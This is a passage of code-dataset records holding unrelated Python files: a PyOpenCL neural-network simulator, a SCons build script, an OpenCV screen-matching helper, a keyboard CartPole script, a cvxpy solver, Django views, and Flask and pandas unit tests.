x.build(self)\n\t\t\tstages.append(stage)\n\t\t\tnext(stage)\n\t\tself.layers_array.finalize()\n\t\tself.neurons_array.finalize()\n\t\tfor stage in stages:\n\t\t\tnext(stage)\n\t\tself.excitatory_synapses_array.finalize()\n\t\tself.inhibitory_synapses_array.finalize()\n\n\tdef tick(self):\n\t\t''' Single tick '''\n\t\twith Profiler() as p:\n\t\t\tself.program.Activation(self.queue, self.neurons_array.data.shape, None, self.neurons_buffer, self.layers_buffer)\n\t\t\t#self.program.Learning(self.queue, self.neurons_array.data.shape, None, self.neurons_buffer, self.layers_buffer, self.excitatory_buffer, self.inhibitory_buffer)\n\t\t\tself.program.Reset(self.queue, self.neurons_array.data.shape, None, self.neurons_buffer)\n\t\t\t# copy buffer from device\n\t\t\tcl.enqueue_copy(self.queue, self.neurons_array.data, self.neurons_buffer)\n\n\tdef run(self, duration):\n\t\tf = open(\"ocl/kernel.cl\")\n\t\tself.kernel = ''.join([\n\t\t\tself.layer_type.ctype, \n\t\t\tself.neuron_type.ctype, \n\t\t\tself.exc_synapses_type.ctype, \n\t\t\tself.inh_synapses_type.ctype, \n\t\t\tf.read()])\n\t\tf.close()\n\t\tprint(self.kernel)\n\t\tself.program = cl.Program(self.ctx, self.kernel).build()\n\n\t\tmf = cl.mem_flags\n\t\tself.neurons_buffer = cl.Buffer(self.ctx, mf.READ_WRITE | mf.COPY_HOST_PTR, hostbuf = self.neurons_array.data)\n\t\tself.excitatory_buffer = cl.Buffer(self.ctx, mf.READ_WRITE | mf.COPY_HOST_PTR, hostbuf = self.excitatory_synapses_array.data)\n\t\tself.inhibitory_buffer = cl.Buffer(self.ctx, mf.READ_ONLY | mf.COPY_HOST_PTR, hostbuf = self.inhibitory_synapses_array.data)\n\t\tself.layers_buffer = cl.Buffer(self.ctx, mf.READ_ONLY | mf.COPY_HOST_PTR, hostbuf = self.layers_array.data)\n\n\t\tself.queue = cl.CommandQueue(self.ctx)\n\t\tself.timer = QtCore.QTimer()\n\t\tself.timer.timeout.connect(self.tick)\n\t\tself.timer.start(duration)\n\n\tdef stop(self):\n\t\tself.timer.stop()\n\ndef opencl_test():\n\n\n\tmy_dtype = np.dtype([(\"a_g\", np.float32), (\"b_g\", np.float32)])\n\t\n\ta_np = np.empty(3).astype(my_dtype)\n\tfor x in a_np:\n\t\tx[0] = np.random.rand(1)\n\t\tx[1] = np.random.rand(1)\n\n\tctx = cl.create_some_context()\n\n\tmy_dtype, ctype = pyopencl.tools.match_dtype_to_c_struct(ctx.devices[0], 'my_type', my_dtype)\n\tpyopencl.tools.get_or_register_dtype('my_type', 
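# register the dtype under this name so PyOpenCL can resolve 'my_type' when it appears in kernel source\n\t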
my_dtype)\n\n\tqueue = cl.CommandQueue(ctx)\n\n\tmf = cl.mem_flags\n\ta = cl.Buffer(ctx, mf.READ_ONLY | mf.COPY_HOST_PTR, hostbuf=a_np)\n\n\tprg = cl.Program(ctx, ctype + \"\"\"\n\t__kernel void sum(__global const my_type *a, __global float *res_g) {\n\t unsigned int gid = get_global_id(0);\n\t res_g[gid] = a[gid].a_g + a[gid].b_g;\n\t}\n\t\"\"\").build()\n\n\tres_g = cl.Buffer(ctx, mf.WRITE_ONLY, 3 * np.dtype('float32').itemsize)\n\tprg.sum(queue, a_np.shape, None, a, res_g)\n\n\tres_np = np.empty(3).astype(np.float32)\n\tcl.enqueue_copy(queue, res_np, res_g)\n\n\t# Check on CPU with Numpy:\n\tprint(res_np)\n\t# print(res_np - (a_np + b_np))\n\t# print(np.linalg.norm(res_np - (a_np + b_np)))\n\n\t\t\ndef click_event(self):\n\tprint('Click')\n\nif __name__ == '__main__':\n\t\n\tapp = QApplication(sys.argv)\n\n\twidget = QWidget()\n\twidget.resize(250, 150)\n\twidget.setWindowTitle('simple')\n\n\tpushButton = QPushButton('Press me...', widget)\n\tpushButton.move(50, 50)\n\tpushButton.clicked.connect(click_event)\n\n\twidget.show()\n\n\tnn = NeuralNetwork()\n\tlayer1 = Layer(width = 15, height =15, threshold = 1, synapses_quantity = (6,))\n\tlayer2 = Layer(width = 15, height =15, threshold = 1, synapses_quantity = (6, 10))\n\tnn.addLayers(layer1, layer2)\n\n\tlayer1.addConnections(FullConnection(layer2), CircularConnection(layer2, 10, connection_type = ConnectionType.Inhibitory))\n\n\tnn.build()\n\tnn.run(1000)\n\t#nn.stop()\n\t\n\tsys.exit(app.exec_())","sub_path":"kassy.py","file_name":"kassy.py","file_ext":"py","file_size_in_byte":10718,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"38476761","text":"#!python\n# (C) Copyright 2018-2021 Intel Corporation.\n#\n# SPDX-License-Identifier: BSD-2-Clause-Patent\n#\n\"\"\"Build swim src\"\"\"\n\nSRC = ['swim.c']\n\ndef scons():\n \"\"\"Scons function\"\"\"\n\n Import('env')\n\n env.AppendUnique(LIBPATH=[Dir('.')])\n\n denv = env.Clone()\n\n denv.AppendUnique(CPPPATH=['#/src/cart/swim'])\n denv.AppendUnique(LIBS=['gurt'])\n denv.Append(CCFLAGS=['-D_USE_CART_'])\n\n swim_targets = denv.SharedObject(SRC)\n swim_lib = denv.SharedLibrary('libswim', swim_targets)\n\n Default(swim_targets)\n Export('swim_lib', 'swim_targets')\n\nif __name__ == \"SCons.Script\":\n scons()\n","sub_path":"src/cart/swim/SConscript","file_name":"SConscript","file_ext":"","file_size_in_byte":611,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"198228774","text":"import os\nimport cv2\nfrom PIL import ImageGrab\nimport numpy as np\nfrom base import log\nfrom base import baseenum\n\nclass ImageEngine:\n\n def __init__(self, registerengine):\n self.registerengine = registerengine\n self.ospath = registerengine.ospath\n self.method = 'cv2.TM_CCOEFF_NORMED'\n\n\n def getimagebypath(self, imagename):\n rootpath = os.path.dirname(os.getcwd()) + \"/Resource/\" + \"%s\" % self.ospath + \"/\"\n imagepath = rootpath + imagename + \".png\"\n\n # Log.log(imagepath)\n\n image = cv2.imread(imagepath,0)\n return image\n\n def find_picture(self, imagename):\n\n try:\n # get image by image name\n image = self.getimagebypath(imagename)\n\n # get screen shot\n # backgroundshot = ImageGrab.grab((0, 0, self.endx, self.endy))\n backgroundshot = ImageGrab.grab()\n # backgroundshot.save(\"C:\\\\Users\\\\baijuyi\\\\Documents\\\\GitHub\\\\yys2\\\\Resource\\\\1.png\")\n\n # convert screen shot to image\n backgroundimage = np.array(backgroundshot.convert('L'))\n\n res = 
cv2.matchTemplate(backgroundimage, image, eval(self.method))\n\n            min_val, max_val, min_loc, max_loc = cv2.minMaxLoc(res)\n\n            # similarity score\n            value = max_val\n\n            if value > 0.9:\n                # get picture position\n                top_left = max_loc\n\n                # get center point\n                w, h = image.shape[::-1]\n                x = int(top_left[0])\n                y = int(top_left[1])\n\n                #compute click point\n                x = int(top_left[0] + w / 2)\n                y = int(top_left[1] + h / 2)\n\n\n                # resize location if macos\n                x = int(x / self.registerengine.ratex)\n                y = int(y / self.registerengine.ratey)\n\n            else:\n                x = 0\n                y = 0\n            log.log(\"image name is '%s' and similar value is '%s' and x,y is '%s,%s'\" % (imagename, value, x, y))\n            self.registerengine.lastx = x\n            self.registerengine.lasty = y\n            return x\n        except:\n            return 0\n\n\n\n\n\n\n\n\n\n\n\n    #\n    # def match(self,img2,template2):\n    #     template = template2.copy()\n    #     w, h = template.shape[::-1]\n    #     x = 0\n    #     y = 0\n    #     value = 0\n    #\n    #\n    #     # compare 6 template-matching methods\n    #     methods = ['cv2.TM_CCOEFF_NORMED']\n    #\n    #     # methods = ['cv2.TM_CCOEFF', 'cv2.TM_CCOEFF_NORMED', 'cv2.TM_CCORR', 'cv2.TM_CCORR_NORMED', 'cv2.TM_SQDIFF', 'cv2.TM_SQDIFF_NORMED']\n    #\n    #     for meth in methods:\n    #         img = img2.copy()\n    #\n    #         method = eval(meth)\n    #\n    #         res = cv2.matchTemplate(img, template, method)\n    #\n    #\n    #\n    #         min_val, max_val, min_loc, max_loc = cv2.minMaxLoc(res)\n    #\n    #         if method in [cv2.TM_SQDIFF, cv2.TM_SQDIFF_NORMED]:\n    #             top_left = min_loc\n    #             value = min_val\n    #         else:\n    #             top_left = max_loc\n    #             value = max_val\n    #\n    #\n    #         x = int(top_left[0] + w / 2)\n    #         y = int(top_left[1] + h / 2)\n    #\n    #         if value > 0.9:\n    #             return x, y\n    #         else:\n    #             return 0, 0","sub_path":"engine/ImageEngine.py","file_name":"ImageEngine.py","file_ext":"py","file_size_in_byte":3277,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"516694587","text":"import gym\r\nimport readchar\r\n\r\nenv = gym.make(\"CartPole-v1\")\r\ngoal_steps = 500 # target number of steps\r\n\r\narrow_keys = {'\x1b[C': 0,'\x1b[D': 1} # map keyboard keys to action numbers\r\n\r\nenv.reset()\r\nenv.render()\r\n\r\n\r\nwhile True:\r\n    sum_reward = 0\r\n    env.reset()\r\n    for i in range(goal_steps):\r\n        key = readchar.readkey() # read a key press\r\n        action = arrow_keys[key]\r\n        obs, reward, done, info = env.step(action) # act on the key press and record the result\r\n        sum_reward += reward\r\n        if done: \r\n            break\r\n        env.render()\r\n    print(\"게임종료. 점수 :\",sum_reward)\r\n\r\n'''import gym\r\nfrom gym.envs.registration import register\r\nimport readchar \r\n\r\narrow_keys = {'\x1b[C': 0,'\x1b[D': 1}\r\n\r\nenv = gym.make(\"CartPole-v1\")\r\nenv.reset()\r\nenv.render() # Show the initial board\r\nwhile True:\r\n    # Choose an action from keyboard\r\n    key = readchar.readkey() # read the action (a key press) directly from the user\r\n    if key not in arrow_keys.keys():\r\n        print(\"Game aborted!\")\r\n        break\r\n    action = arrow_keys[key] # each key maps to a value (UP, DOWN, RIGHT, LEFT), and each of those has a matching number; that number is stored in the action variable
\r\n    state, reward, done, info = env.step(action)\r\n    env.render() # Show the board after action\r\n    print(\"State: \", state, \"Action: \", action,\r\n          \"Reward: \", reward, \"Info: \", info)\r\n    print(\"[INFO] done:\", done)\r\n    if done:\r\n        print(\"Finished with reward\", reward)\r\n        break'''","sub_path":"rl/python/machine/cartpole_key.py","file_name":"cartpole_key.py","file_ext":"py","file_size_in_byte":1575,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"469347941","text":"import os\nimport numpy as np\nimport cvxpy as cp\nimport scipy.io as sio\nimport scipy.misc\n\nfrom utils import setup_logger\n\nimport argparse\n\nparser = argparse.ArgumentParser(description='Test LADMM with synthetic data')\nparser.add_argument('-c', '--cols', type=int, default=0, help='number of columns in A to be replaced')\nparser.add_argument('-p', '--p', type=float, default=0.2, help='p in the Bernoulli distribution')\nparser.add_argument('-m', '--mu', type=float, default=0.0, help='mu of Gaussian dist')\nparser.add_argument('-s', '--sigma', type=float, default=2.0, help='sigma of Gaussian dist')\nparser.add_argument('--data-type', type=str, default='gaussian', help='data type')\nparser.add_argument('-a', '--alpha', type=float, default=0.01, help='hyper-param in the objective')\nparser.add_argument('-e', '--epsilon', type=float, default=1e-4, help='hyper-param in the objective')\nparser.add_argument('--split', type=str, default='test', help='calculate train or test split')\nparser.add_argument('--batch-size', type=int, default=20, help='batch size')\n\ndef loss_l1(X):\n    return cp.sum(cp.abs(X))\n\ndef loss_l2(X):\n    return cp.sum(X**2)\n\ndef augmented_objective_fn(Z, E, alpha, eps):\n    Z_part = alpha * (loss_l1(Z) + eps / 2.0 * loss_l2(Z))\n    E_part = loss_l1(E) + eps / 2.0 * loss_l2(E)\n    return (Z_part + E_part) / Z.shape[1]\n\nif __name__ == '__main__':\n    args = parser.parse_args()\n\n    alpha = args.alpha\n    eps = args.epsilon\n    split = args.split\n    batch_size = args.batch_size\n\n    # test data file\n    test_file = 'syn_data'\n    test_file += '_cols{}'.format(args.cols) if args.cols > 0 else ''\n    test_file += '_p{}_mu{}_s{}'.format(args.p, args.mu, args.sigma)\n    test_file += '_{}'.format(args.data_type) if args.data_type != 'gaussian' else ''\n    test_file += '.mat'\n    print('using testing data file {}'.format(test_file))\n\n    # logger file\n    if not os.path.isdir('cvx-solutions'):\n        os.makedirs('cvx-solutions')\n    if not os.path.isdir('cvx-solutions/logs'):\n        os.makedirs('cvx-solutions/logs')\n    save_file = os.path.join(\n        'cvx-solutions',\n        '{}-dual-alpha{}-eps{}-{}.npz'.format(test_file[:-4], alpha, eps, split))\n    log_file = os.path.join(\n        'cvx-solutions/logs',\n        '{}-dual-alpha{}-eps{}-{}.log'.format(test_file[:-4], alpha, eps, split))\n    print = setup_logger(log_file)\n\n    syn_data = sio.loadmat(test_file)\n    A = syn_data['A'].astype(np.float32)\n    m, n = A.shape\n\n    X = syn_data[split + '_x'].astype(np.float32).T # (m, #samples)\n    Z = syn_data[split + '_z'].astype(np.float32).T # (n, #samples)\n    E = syn_data[split + '_e'].astype(np.float32).T # (m, #samples)\n    n_samples = X.shape[1]\n\n    Z_var = cp.Variable((n,batch_size))\n    E_var = cp.Variable((m,batch_size))\n    X_param = cp.Parameter((m,batch_size))\n    objective = cp.Minimize(augmented_objective_fn(Z_var, E_var, alpha, eps))\n    constraints = [cp.matmul(A, Z_var) + E_var == X_param]\n    problem = cp.Problem(objective, constraints)\n\n    Z_sol = np.zeros(Z.shape, dtype=np.float32)\n    E_sol = 
np.zeros(E.shape, dtype=np.float32)\n L_sol = np.zeros((m, E.shape[1]), dtype=np.float32)\n\n for i in range(n_samples // batch_size):\n\n X_param.value = X[:, i*batch_size:(i+1)*batch_size]\n out = problem.solve()\n print('[{:2d}/{:2d}]\\t{}'.format(i+1, n_samples//batch_size, out))\n Z_sol[:, i*batch_size:(i+1)*batch_size] = Z_var.value\n E_sol[:, i*batch_size:(i+1)*batch_size] = E_var.value\n L_sol[:, i*batch_size:(i+1)*batch_size] = constraints[0].dual_value\n\n np.savez(save_file, Z=Z_sol, E=E_sol, L=L_sol)\n print('Solutions saved to file {}'.format(save_file))\n\n","sub_path":"compute_cvx_solutions_dual.py","file_name":"compute_cvx_solutions_dual.py","file_ext":"py","file_size_in_byte":3677,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"399060709","text":"# -*- coding: UTF-8 -*-\nimport sys, os\nimport subprocess, hashlib\nfrom datetime import datetime, timedelta\nimport smtplib, zlib\nimport logging.config, logging, logging.handlers\nimport YhLog\ntry:\n import json\nexcept:\n import simplejson as json\n \nlogger = logging.getLogger(__name__)\n\n\n'''\n return comp from unicode string\n'''\ndef compress(str_unicode=''):\n str_utf8 = str_unicode\n if(type(str_unicode) is unicode):\n str_utf8 = str_unicode.encode('utf-8', 'ignore')\n return zlib.compress(str_utf8)\n\n'''\n return unicode string from comp\n'''\ndef decompress(str_comp=''):\n str_utf8 = str_comp\n if(type(str_comp) is unicode):\n str_utf8 = str_comp.encode('utf-8', 'ignore')\n return unicode(zlib.decompress(str_utf8), 'utf-8', 'ignore')\n\ndef test():\n logger.setLevel(logging.DEBUG)\n a = {'name':u'测试', 'val':u'返回值','error':'0'}\n str_a = json.dumps(a)\n logger.warn(str_a)\n comp_a = compress(str_a)\n decomp_a = decompress(comp_a)\n b = json.loads(decomp_a)\n logger.warn(str(b))\n\nif __name__=='__main__':\n test()\n ","sub_path":"YhCompress.py","file_name":"YhCompress.py","file_ext":"py","file_size_in_byte":1090,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"522454709","text":"db.create_all()\nDocument.insert_documents()\nFormField.insert_fields()\nTextLineSource.load_sources()\n\n# Add 'Other' to forms table\nform = Form(form_name='Other')\ndb.session.add(form)\n\nfilename = 'ML15009A030'\nDocument.load_pdf(filename)\ndoc = Document.query.filter_by(filename=filename).first()\npage_number = 1\npage = Page.query.filter(Page.doc_id == doc.id).filter(Page.page_number == page_number).first()\nform = Form.query.filter_by(form_name='Form 366').first()\n\n# update page form\npage.page_form = form\n\n# get form fields and text line\ntop_form_field = FormField.query.filter_by(name='Top Form 366').first()\nbottom_form_field = FormField.query.filter_by(name='Bottom Form 366').first()\ntop_textline = TextLine.query.filter_by(text='NRC FORM 366 \\n(01-2014) \\n').first()\n\n# add tag for field: Top Form 366\ntagged_text = TaggedText(textline=top_textline, field=top_form_field)\ndb.session.add(tagged_text)\n\n# add missing tag\nmissing_field = MissingField(missing_page=page, field=bottom_form_field)\ndb.session.add(missing_field)\n\ndb.session.commit()\n","sub_path":"add_initial_data.py","file_name":"add_initial_data.py","file_ext":"py","file_size_in_byte":1051,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"16327000","text":"# Testing video capture with opencv2.\r\n\r\n\r\nimport cv2\r\n\r\ncap = cv2.VideoCapture(0)\r\n\r\nwhile True :\r\n ret,frame = 
cap.read()\r\n grayframe = cv2.cvtColor(frame,cv2.COLOR_BGR2GRAY)\r\n \r\n # Show this image\r\n cv2.imshow('fig',frame)\r\n if cv2.waitKey(1) & 0xFF==ord('q'):\r\n break\r\n \r\ncap.release()\r\ncv2.destroyAllWindows()","sub_path":"prework/opencv/useCamera.py","file_name":"useCamera.py","file_ext":"py","file_size_in_byte":342,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"552236759","text":"from htetl.extract.phones import extract_phone\nimport os\nimport pandas as pd\nfrom pandas.util.testing import assert_frame_equal\n\ndef test_extract_phones():\n df = pd.DataFrame(\n [\n (1, \"blah blah 123-456-7890\"),\n (2, \"No phone number here!\"),\n (3, \"000-000-0000 and another one twothree4-ONE45-zeRO5fIve5\")\n ],\n columns=[\"id\", \"content\"]\n )\n expected = pd.DataFrame(\n [\n (1, \"123-456-7890\"),\n (3, \"000-000-0000\"),\n (3, \"234-145-0555\"),\n ],\n columns=[\"pageid\", \"phone\"]\n )\n phone_df = extract_phone(df)\n assert_frame_equal(phone_df,expected)\n #assert all(phone_df == expected)\n\ndef test_no_numbers():\n df = pd.DataFrame(\n [\n (1, \"blah blah 123-456-789\"),\n (2, \"No phone number here!\"),\n (3, \"000-000dashs0000\")\n ],\n columns=[\"id\", \"content\"]\n )\n\n phone_df = extract_phone(df)\n assert phone_df.empty\n","sub_path":"tests/extract/test_phones.py","file_name":"test_phones.py","file_ext":"py","file_size_in_byte":993,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"520288004","text":"# APITESTS.PY\n\n\"\"\"Basic functionality testing for provided API endpoints.\"\"\"\n\nimport config\nimport os\nimport json\nimport unittest\nimport api\n\nfrom flask import Flask\n\ntry:\n from flask_testing import TestCase\nexcept ImportError as e:\n print(\"PLEASE RUN 'pip install Flask-Testing'.\")\n\n\nclass TestCharactersEndpoint(TestCase):\n def create_app(self):\n # Note: Since we do not pull the cache into our test,\n # all cache calls done by our app will return None, so\n # our app always loads from disk for the purpose of testing.\n # This is intended, as cache functionality should be tested\n # separately (as it is). 
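Cache hits\n        # would otherwise mask regressions in the disk loaders.\n        # 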
Ditto for other endpoint tests.\n return api.create_app()\n\n def test_all_data(self):\n # Ensure the correct keys are returned.\n all_route = os.path.join(config.CHARACTERS_DIR, config.ALL_DATA)\n response = self.client.get(all_route)\n with open(config.HP_CHARACTERS_FILE_PATH) as f:\n actual = json.load(f)\n self.assertEqual(response.json, [entity['_id'] for entity in actual])\n\n def test_valid_request(self):\n valid_id = '5a0fa4daae5bc100213c232e'\n expected = {\"_id\":\"5a0fa4daae5bc100213c232e\",\"name\":\"Hannah Abbott\",\n \"role\":\"student\",\"house\":\"Hufflepuff\",\n \"school\":\"Hogwarts School of Witchcraft and Wizardry\",\n \"__v\":0,\"ministryOfMagic\":False,\"orderOfThePhoenix\":False,\n \"dumbledoresArmy\":True,\"deathEater\":False,\n \"bloodStatus\":\"half-blood\",\"species\":\"human\"}\n\n valid_route = os.path.join(config.CHARACTERS_DIR, valid_id)\n response = self.client.get(valid_route)\n \n self.assertEqual(response.json, expected)\n\n def test_invalid_request(self):\n invalid_id = 'invalid'\n expected = {'error': f'404 Not Found: Invalid character id: {invalid_id}.'}\n\n invalid_route = os.path.join(config.CHARACTERS_DIR, invalid_id)\n response = self.client.get(invalid_route)\n\n self.assertEqual(response.json, expected)\n\n\nclass TestSpellsEndpoint(TestCase):\n def create_app(self):\n return api.create_app()\n\n def test_all_data(self):\n # Ensure the correct keys are returned.\n all_route = os.path.join(config.SPELLS_DIR, config.ALL_DATA)\n response = self.client.get(all_route)\n with open(config.HP_SPELLS_FILE_PATH) as f:\n actual = json.load(f)\n self.assertEqual(response.json, [entity['_id'] for entity in actual])\n\n def test_valid_request(self):\n valid_id = '5b74ebd5fb6fc0739646754c'\n expected = {\"_id\":\"5b74ebd5fb6fc0739646754c\",\"spell\":\"Aberto\",\n \"type\":\"Charm\",\"effect\":\"opens objects\"}\n\n valid_route = os.path.join(config.SPELLS_DIR, valid_id)\n response = self.client.get(valid_route)\n\n self.assertEqual(response.json, expected)\n \n def test_invalid_request(self):\n invalid_id = 'invalid'\n expected = {'error': f'404 Not Found: Invalid spell id: {invalid_id}.'}\n\n invalid_route = os.path.join(config.SPELLS_DIR, invalid_id)\n response = self.client.get(invalid_route)\n\n self.assertEqual(response.json, expected)\n \n\nclass TestHousesEndpoint(TestCase):\n def create_app(self):\n return api.create_app()\n\n def test_all_data(self):\n # Ensure the correct keys are returned.\n all_route = os.path.join(config.HOUSES_DIR, config.ALL_DATA)\n response = self.client.get(all_route)\n with open(config.HP_HOUSES_FILE_PATH) as f:\n actual = json.load(f)\n self.assertEqual(response.json, [entity['_id'] for entity in actual])\n\n def test_valid_request(self):\n valid_id = '5a05dc58d45bd0a11bd5e070'\n expected = {\"_id\":\"5a05dc58d45bd0a11bd5e070\",\"name\":\"Hufflepuff\",\n \"mascot\":\"badger\",\"headOfHouse\":\"Pomona Sprout\",\n \"houseGhost\":\"The Fat Friar\",\"founder\":\"Helga Hufflepuff\",\n \"__v\":0,\"school\":\"Hogwarts School of Witchcraft and Wizardry\",\n \"members\":[\"5a0fa11a4d153d00212c47cc\",\"5a0fa360ae5bc100213c232c\",\n \"5a0fa365ae5bc100213c232d\",\"5a0fa4daae5bc100213c232e\",\"5a0fa842ae5bc100213c2339\",\n \"5a0fa86dae5bc100213c233a\",\"5a1096253dc2080021cd875f\",\"5a1098bd3dc2080021cd876d\",\n \"5a109c993dc2080021cd8783\",\"5a1223720f5ae10021650d6f\",\"5a1223ed0f5ae10021650d70\",\n \"5a122f3d0f5ae10021650d8d\",\"5a1232b10f5ae10021650d95\",\"5a12333f0f5ae10021650d96\",\n 
\"5a1234500f5ae10021650d99\",\"5a1235790f5ae10021650d9d\",\"5a123cb40f5ae10021650dbc\"],\n \"values\":[\"hard work\",\"patience\",\"justice\",\"loyalty\"],\"colors\":[\"yellow\",\"black\"]}\n\n valid_route = os.path.join(config.HOUSES_DIR, valid_id)\n response = self.client.get(valid_route)\n\n self.assertEqual(response.json, expected)\n \n def test_invalid_request(self):\n invalid_id = 'invalid'\n expected = {'error': f'404 Not Found: Invalid house id: {invalid_id}.'}\n\n invalid_route = os.path.join(config.HOUSES_DIR, invalid_id)\n response = self.client.get(invalid_route)\n\n self.assertEqual(response.json, expected)\n \n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"backend/apitests.py","file_name":"apitests.py","file_ext":"py","file_size_in_byte":5314,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"246452250","text":"import argparse\nimport os\nimport time\n\nimport numpy as np\nfrom pycompss.api.api import barrier\n\nfrom dislib.classification import RandomForestClassifier\nfrom dislib.data import (load_libsvm_file, load_libsvm_files, load_txt_file,\n load_txt_files)\n\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--libsvm\", help=\"read files in libsvm format\",\n action=\"store_true\")\n parser.add_argument(\"-dt\", \"--detailed_times\",\n help=\"get detailed execution times (read and fit)\",\n action=\"store_true\")\n parser.add_argument(\"-e\", \"--estimators\", metavar=\"N_ESTIMATORS\",\n type=int, help=\"default is 10\", default=10)\n parser.add_argument(\"-p\", \"--part_size\", metavar=\"PART_SIZE\", type=int,\n help=\"size of the partitions in which to divide the \"\n \"input dataset (default is 100)\", default=100)\n parser.add_argument(\"-md\", \"--max_depth\", metavar=\"MAX_DEPTH\",\n type=int, help=\"default is np.inf\", required=False)\n parser.add_argument(\"-dd\", \"--dist_depth\", metavar=\"DIST_DEPTH\", type=int,\n help=\"default is auto\", required=False)\n parser.add_argument(\"-f\", \"--features\", metavar=\"N_FEATURES\", type=int,\n default=None, required=True)\n parser.add_argument(\"--dense\", help=\"use dense data structures\",\n action=\"store_true\")\n parser.add_argument(\"-t\", \"--test-file\", metavar=\"TEST_FILE_PATH\",\n help=\"test CSV file path\", type=str, required=False)\n parser.add_argument(\"train_data\",\n help=\"File or directory containing files \"\n \"(if a directory is provided PART_SIZE is \"\n \"ignored)\", type=str)\n args = parser.parse_args()\n\n train_data = args.train_data\n\n s_time = time.time()\n read_time = 0\n\n sparse = not args.dense\n\n if os.path.isdir(train_data):\n if args.libsvm:\n data = load_libsvm_files(train_data, args.features,\n store_sparse=sparse)\n else:\n data = load_txt_files(train_data, args.features, label_col=\"last\")\n else:\n if args.libsvm:\n data = load_libsvm_file(train_data, subset_size=args.part_size,\n n_features=args.features,\n store_sparse=sparse)\n else:\n data = load_txt_file(train_data, subset_size=args.part_size,\n n_features=args.features, label_col=\"last\")\n\n if args.detailed_times:\n barrier()\n read_time = time.time() - s_time\n s_time = time.time()\n\n if args.dist_depth:\n dist_depth = args.dist_depth\n else:\n dist_depth = \"auto\"\n\n if args.max_depth:\n max_depth = args.max_depth\n else:\n max_depth = np.inf\n\n forest = RandomForestClassifier(n_estimators=args.estimators,\n max_depth=max_depth,\n distr_depth=dist_depth)\n forest.fit(data)\n\n barrier()\n fit_time = time.time() - 
s_time\n\n out = [forest.n_estimators, forest.distr_depth, forest.max_depth,\n read_time, fit_time]\n\n if args.test_file:\n if args.libsvm:\n test_data = load_libsvm_file(args.test_file,\n n_features=args.features,\n subset_size=args.part_size,\n store_sparse=sparse)\n else:\n test_data = load_txt_file(args.test_file,\n n_features=args.features,\n subset_size=args.part_size,\n label_col=\"last\")\n\n out.append(forest.score(test_data))\n\n print(out)\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"examples/rf-driver.py","file_name":"rf-driver.py","file_ext":"py","file_size_in_byte":4022,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"66745662","text":"from django.shortcuts import get_object_or_404, render\nfrom businesses.models import Business, Goal, Worker, Resource, Finance, Location, Material,Room\nfrom django.shortcuts import render_to_response, HttpResponse\nfrom django.template.context import RequestContext\nfrom chartit import DataPool, Chart\nfrom django.http import HttpResponseRedirect\nfrom django.core.urlresolvers import reverse\n\n\nfrom models import Goal_score, Finance_score\n\n\ndef goal_chart_view(request, business_id, goal_id):\n goal_data = \\\n DataPool(\n series=\n [{'options': {\n 'source': Goal_score.objects.filter(goal_name_id=goal_id)},\n 'terms': [\n 'school_year',\n 'goal',\n 'score']}\n ])\n\n\n cht = Chart(\n datasource=goal_data,\n series_options=\n [{'options': {\n 'type': 'line',\n 'stacking': False},\n 'terms': {\n 'school_year': [\n 'goal',\n 'score']\n }}],\n chart_options=\n {'title': {\n 'text': 'Data of ' + Goal.objects.get(pk=goal_id).goal_name },\n 'xAxis': {\n 'title': {\n 'text': 'school_year'}}})\n\n business = get_object_or_404(Business, pk=business_id)\n\n context = {'business': business,\n 'datachart': cht}\n\n return render(request, 'businesses/chart.html', context)\n\n\ndef finance_chart_view(request, business_id,finance_id):\n ds = DataPool(\n series=\n [{'options': {\n 'source': Finance_score.objects.filter(finance_name_id=finance_id)},\n 'terms': [\n 'year',\n 'goal',\n 'price']}\n ])\n\n\n cht = Chart(\n datasource=ds,\n series_options=\n [{'options': {\n 'type': 'column',\n 'stacking': True,\n 'stack': 0},\n 'terms': {\n 'year': [\n 'goal',\n {'price': {\n 'stack': 1}},]\n }}],\n chart_options=\n {'title': {\n 'text': 'Data of ' + Finance.objects.get(pk=finance_id).name },\n 'xAxis': {\n 'title': {\n 'text': 'year'}}})\n\n business = get_object_or_404(Business, pk=business_id)\n\n context = {'business': business,\n 'datachart': cht}\n\n return render(request, 'businesses/chart1.html', context)\n\n\n\ndef room(request, business_id, location_id):\n business = get_object_or_404(Business, pk=business_id)\n location = get_object_or_404(Location, pk=location_id)\n context = {'business': business,\n 'location': location}\n return render(request, 'businesses/room.html', context)\n\n\ndef reservation(request, business_id, location_id, room_id):\n room = Room.objects.get(pk=room_id)\n\n if room.reservation == 'Available':\n room.reservation = 'Occupied'\n room.save()\n\n return HttpResponseRedirect(reverse('businesses:room', args=(business_id,location_id,)))\n\n\ndef room_return(request, business_id, location_id, room_id):\n room = Room.objects.get(pk=room_id)\n\n if room.reservation == 'Occupied':\n room.reservation = 'Available'\n room.save()\n\n return HttpResponseRedirect(reverse('businesses:room', args=(business_id,location_id,)))\n\ndef material_number(request, 
